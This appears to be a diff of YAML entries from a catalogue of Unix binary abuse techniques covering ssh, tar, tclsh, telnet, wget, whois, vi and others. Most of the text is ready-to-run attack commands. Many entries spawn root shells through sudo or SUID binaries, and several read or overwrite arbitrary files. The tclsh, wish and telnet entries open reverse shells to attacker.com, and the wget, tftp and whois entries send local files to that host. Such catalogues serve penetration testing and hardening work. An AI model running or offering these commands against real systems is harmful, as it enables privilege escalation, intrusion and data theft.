- description: The read file content is corrupted by error prints. - description: The read file content is corrupted by error prints.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
-i'" x
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: stdbuf -i0 /bin/sh - code: stdbuf -i0 /bin/sh
suid-enabled: suid-enabled:
- code: "./stdbuf -i0 /bin/sh -p" - code: ./stdbuf -i0 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo stdbuf -i0 /bin/sh - code: sudo stdbuf -i0 /bin/sh
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: strace -o /dev/null /bin/sh - code: strace -o /dev/null /bin/sh
suid-enabled: suid-enabled:
- code: "./strace -o /dev/null /bin/sh -p" - code: ./strace -o /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh - code: sudo strace -o /dev/null /bin/sh
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
tail -c1G "$LFILE" tail -c1G "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./tail -c1G "$LFILE" ./tail -c1G "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo tail -c1G "$LFILE" sudo tail -c1G "$LFILE"
--- ---

View File

@ -1,24 +1,24 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive: execute-non-interactive:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write: file-write:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)
echo data > "$TF" echo data > "$TF"
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read: file-read:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled: sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: suid-limited:
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: taskset 1 /bin/sh - code: taskset 1 /bin/sh
suid-enabled: suid-enabled:
- code: "./taskset 1 /bin/sh -p" - code: ./taskset 1 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo taskset 1 /bin/sh - code: sudo taskset 1 /bin/sh
--- ---

View File

@ -1,21 +1,21 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
tclsh tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled: suid-enabled:
- code: | - code: |
./tclsh ./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo tclsh sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
--- ---

View File

@ -1,18 +1,16 @@
--- ---
description: 'It can only append data if the destination exists. description: It can only append data if the destination exists.
'
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | ./tee -a "$LFILE" echo data | ./tee -a "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | ./tee -a "$LFILE" echo data | ./tee -a "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | sudo tee -a "$LFILE" echo data | sudo tee -a "$LFILE"
--- ---

View File

@ -1,35 +1,35 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
telnet $RHOST $RPORT telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
TF=$(mktemp) TF=$(mktemp)
rm $TF rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled: sudo-enabled:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
sudo telnet $RHOST $RPORT sudo telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
./telnet $RHOST $RPORT ./telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
put file_to_send put file_to_send
download: download:
- description: Fetch a remote file from a TFTP server. - description: Fetch a remote file from a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
get file_to_get get file_to_get
--- ---

View File

@ -1,12 +1,10 @@
--- ---
description: | description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
Note that the shell might have its own builtin time implementation, which may
behave differently than` /usr/bin/time`, hence the absolute path.
functions: functions:
execute-interactive: execute-interactive:
- code: "/usr/bin/time /bin/sh" - code: /usr/bin/time /bin/sh
suid-enabled: suid-enabled:
- code: "./time /bin/sh -p" - code: ./time /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /usr/bin/time /bin/sh - code: sudo /usr/bin/time /bin/sh
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: timeout 7d /bin/sh - code: timeout 7d /bin/sh
suid-enabled: suid-enabled:
- code: "./timeout 7d /bin/sh -p" - code: ./timeout 7d /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh - code: sudo timeout --foreground 7d /bin/sh
--- ---

View File

@ -1,18 +1,16 @@
--- ---
description: | description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
ul "$LFILE" ul "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./ul "$LFILE" ./ul "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo ul "$LFILE" sudo ul "$LFILE"
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
unexpand -t99999999 "$LFILE" unexpand -t99999999 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./unexpand -t99999999 "$LFILE" ./unexpand -t99999999 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE" sudo unexpand -t99999999 "$LFILE"
--- ---

View File

@ -1,18 +1,16 @@
--- ---
description: 'The read file content is corrupted by squashing multiple adjacent lines. description: The read file content is corrupted by squashing multiple adjacent lines.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
uniq "$LFILE" uniq "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./uniq "$LFILE" ./uniq "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo uniq "$LFILE" sudo uniq "$LFILE"
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: unshare /bin/sh - code: unshare /bin/sh
suid-enabled: suid-enabled:
- code: "./unshare -r /bin/sh" - code: ./unshare -r /bin/sh
sudo-enabled: sudo-enabled:
- code: sudo unshare /bin/sh - code: sudo unshare /bin/sh
--- ---

View File

@ -1,21 +1,19 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: vi -c ':!/bin/sh' - code: vi -c ':!/bin/sh'
- code: | - code: |
vi vi
:set shell=/bin/sh :set shell=/bin/sh
:shell :shell
file-write: file-write:
- code: | - code: |
vi file_to_write vi file_to_write
w w
file-read: file-read:
- code: 'vi file_to_read - code: vi file_to_read
'
suid-enabled: suid-enabled:
- code: "./vi -c ':!/bin/sh -p'" - code: ./vi -c ':!/bin/sh -p'
sudo-enabled: sudo-enabled:
- code: sudo vi -c ':!/bin/sh' - code: sudo vi -c ':!/bin/sh'
--- ---

View File

@ -1,12 +1,12 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- code: watch /usr/bin/id - code: watch /usr/bin/id
suid-enabled: suid-enabled:
- description: This keeps the SUID privileges only if the `-x` option is present. - description: This keeps the SUID privileges only if the `-x` option is present.
code: "./watch -x /usr/bin/id" code: ./watch -x /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo watch /usr/bin/id - code: sudo watch /usr/bin/id
suid-limited: suid-limited:
- code: "./watch /usr/bin/id" - code: ./watch /usr/bin/id
--- ---

View File

@ -1,16 +1,15 @@
--- ---
functions: functions:
upload: upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
Run an HTTP service on the attacker box to collect the file. code: |
code: | export URL=http://attacker.com/
export URL=http://attacker.com/ export LFILE=file_to_send
export LFILE=file_to_send wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
--- ---

View File

@ -1,37 +1,31 @@
--- ---
description: "`whois` hangs waiting for the remote peer to close the socket.\n" description: |
`whois` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` code: |
and its length is limited by the maximum size of arguments. RHOST=attacker.com
code: | RPORT=12345
RHOST=attacker.com LFILE=file_to_send
RPORT=12345 whois -h $RHOST -p $RPORT "`cat $LFILE`"
LFILE=file_to_send - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
whois -h $RHOST -p $RPORT "`cat $LFILE`" code: |
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' RHOST=attacker.com
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file RPORT=12345
length is limited by the maximum size of arguments. LFILE=file_to_send
code: | whois -h $RHOST -p $RPORT "`base64 $LFILE`"
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download: download:
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
< "file_to_send"` on the attacker box to send the file. The file has instances code: |
of `$'\x0d'` stripped. RHOST=attacker.com
code: | RPORT=12345
RHOST=attacker.com LFILE=file_to_save
RPORT=12345 whois -h $RHOST -p $RPORT > "$LFILE"
LFILE=file_to_save - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
whois -h $RHOST -p $RPORT > "$LFILE" code: |
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" RHOST=attacker.com
| nc -l -p 12345` on the attacker box to send the file. RPORT=12345
code: | LFILE=file_to_save
RHOST=attacker.com whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
--- ---

View File

@ -1,17 +1,17 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
wish wish
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo wish sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
--- ---

View File

@ -1,16 +1,14 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- code: xargs -a /dev/null /usr/bin/id - code: xargs -a /dev/null /usr/bin/id
file-read: file-read:
- description: This works as long as the file does not contain the NUL character, - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. code: |
GNU version only. LFILE=file_to_read
code: | xargs -a "$LFILE" -0
LFILE=file_to_read
xargs -a "$LFILE" -0
suid-enabled: suid-enabled:
- code: "./xargs -a /dev/null /usr/bin/id" - code: ./xargs -a /dev/null /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo xargs -a /dev/null /usr/bin/id - code: sudo xargs -a /dev/null /usr/bin/id
--- ---

View File

@ -1,19 +1,19 @@
--- ---
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | xxd | xxd -r - "$LFILE" echo data | xxd | xxd -r - "$LFILE"
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
xxd "$LFILE" | xxd -r xxd "$LFILE" | xxd -r
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./xxd "$LFILE" | xxd -r ./xxd "$LFILE" | xxd -r
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo xxd "$LFILE" | xxd -r sudo xxd "$LFILE" | xxd -r
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: zsh - code: zsh
suid-enabled: suid-enabled:
- code: "./zsh" - code: ./zsh
sudo-enabled: sudo-enabled:
- code: sudo zsh - code: sudo zsh
--- ---